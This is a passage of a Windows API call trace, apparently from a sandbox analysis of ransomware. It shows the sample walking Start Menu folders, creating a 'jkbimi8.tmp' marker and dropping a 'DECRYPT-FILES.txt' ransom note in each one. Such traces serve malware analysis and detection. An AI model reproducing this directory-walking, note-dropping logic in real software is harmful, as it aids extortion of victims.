cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 1 [0088.265] lstrcatW (in: lpString1="Administrative Tools", lpString2="\\" | out: lpString1="Administrative Tools\\") returned="Administrative Tools\\" [0088.265] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Administrative Tools\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" [0088.265] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\jkbimi8.tmp") returned 104 [0088.265] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0088.266] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 92 [0088.266] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.266] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\DECRYPT-FILES.txt") returned 110 [0088.266] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0088.266] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0088.267] CloseHandle (hObject=0x454) returned 1 [0088.267] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 92 [0088.267] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0088.267] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0088.267] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.267] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.267] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.267] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.267] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ceee20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.267] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" [0088.267] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\jkbimi8.tmp" [0088.267] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.268] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.268] CloseHandle (hObject=0x0) returned 0 [0088.268] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.268] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ceee20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.268] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0088.268] CloseHandle (hObject=0x450) returned 1 [0088.268] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0cc8cc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.268] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\" [0088.268] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\jkbimi8.tmp" [0088.268] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.269] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.269] CloseHandle (hObject=0x0) returned 0 [0088.269] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.269] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0088.269] lstrcmpW (lpString1="Maintenance", lpString2=".") returned 1 [0088.269] lstrcmpW (lpString1="Maintenance", lpString2="..") returned 1 [0088.269] lstrcatW (in: lpString1="Maintenance", lpString2="\\" | out: lpString1="Maintenance\\") returned="Maintenance\\" [0088.269] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Maintenance\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" [0088.269] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\jkbimi8.tmp") returned 95 [0088.269] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0088.270] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 83 [0088.270] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.270] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\DECRYPT-FILES.txt") returned 101 [0088.270] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0088.270] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0088.271] CloseHandle (hObject=0x454) returned 1 [0088.271] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned 83 [0088.271] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0088.271] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0088.271] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.271] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.271] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.271] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.271] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ceee20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.271] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\" [0088.271] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\jkbimi8.tmp" [0088.272] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.272] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.272] CloseHandle (hObject=0x0) returned 0 [0088.272] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.272] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ceee20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.272] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0088.272] CloseHandle (hObject=0x450) returned 1 [0088.272] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1 [0088.272] lstrcmpW (lpString1="Startup", lpString2=".") returned 1 [0088.272] lstrcmpW (lpString1="Startup", lpString2="..") returned 1 [0088.272] lstrcatW (in: lpString1="Startup", lpString2="\\" | out: lpString1="Startup\\") returned="Startup\\" [0088.272] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Startup\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" [0088.273] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\jkbimi8.tmp") returned 91 [0088.273] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0088.273] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 79 [0088.273] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.273] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\DECRYPT-FILES.txt") returned 97 [0088.273] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0088.273] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0088.274] CloseHandle (hObject=0x454) returned 1 [0088.274] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 79 [0088.274] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0088.274] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0088.275] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.275] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.275] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.275] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.275] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ceee20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.275] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" [0088.275] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jkbimi8.tmp" [0088.275] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.275] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.275] CloseHandle (hObject=0x0) returned 0 [0088.275] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.275] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ceee20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.276] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0088.276] CloseHandle (hObject=0x450) returned 1 [0088.276] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup\\", cAlternateFileName="")) returned 0 [0088.276] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0088.276] CloseHandle (hObject=0x448) returned 1 [0088.278] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs\\", cAlternateFileName="")) returned 0 [0088.279] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.279] CloseHandle (hObject=0x440) returned 1 [0088.279] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda4e0ba, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0088.279] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0088.279] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0088.279] lstrcatW (in: lpString1="Templates", lpString2="\\" | out: lpString1="Templates\\") returned="Templates\\" [0088.279] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Templates\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") 